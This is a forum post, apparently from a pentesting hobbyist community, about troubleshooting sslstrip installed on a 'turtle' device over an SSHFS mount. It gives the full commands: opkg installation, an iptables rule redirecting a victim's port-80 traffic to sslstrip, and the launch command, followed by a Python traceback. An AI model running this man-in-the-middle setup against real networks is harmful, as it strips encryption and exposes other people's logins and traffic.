I started playing around with this today and thought I had it working... turns out, once I started browsing on the victim host, sslstrip threw a bunch of exception errors. I do not belive the problem was with my iptables though, I think it was with my installation over sshfs. Let me describe what I did to see if I was in the right direction...
1) SSH into turtle and enable, start, and verify SSHFS is operational (mounted at /sshfs)
2) Added a new line at the end of /etc/opkg.conf file.
dest sshfs /sshfs
3) Install sslstrip to mounted sshfs
opkg install --dest sshfs sslstrip
4) link to python2.7 dependencies (where I think my issues are....)
ln -s /sshfs/usr/lib/python2.7/ /usr/lib/python2.7
5) setup init file
touch /sshfs/usr/lib/python2.7/site-packages/zope/__init__.py
6) verify port forwarding is enabled (should be 1). Mine was already enabled by default
cat /proc/sys/net/ipv4/ip_forward
7) setup iptables to redirect traffic. I made sure to explicitly define the interface, maybe this is where you were having problems @telot?
iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j REDIRECT --to-port 6969
8) start sslstrip
sslstrip -l 6969
It will function as normal until a website is requested, then sslstrip throws the following errors
sslstrip 0.9 by Moxie Marlinspike running...
Traceback (most recent call last):
File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext
return func(*args,**kw)
--- <exception caught here> ---
File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite
That makes it seem like my forwarding is working, but sslstrip is not...likely due to the sshfs mount... I wonder if the "thou shalt not install kernal modules on USB storage" also applies for SSHFS mounts. ;) - source https://dev.openwrt.org/ticket/10739
Tomorrow I am going to just download the standalone tarball and execute sslstrip without performing an installation and see what happens...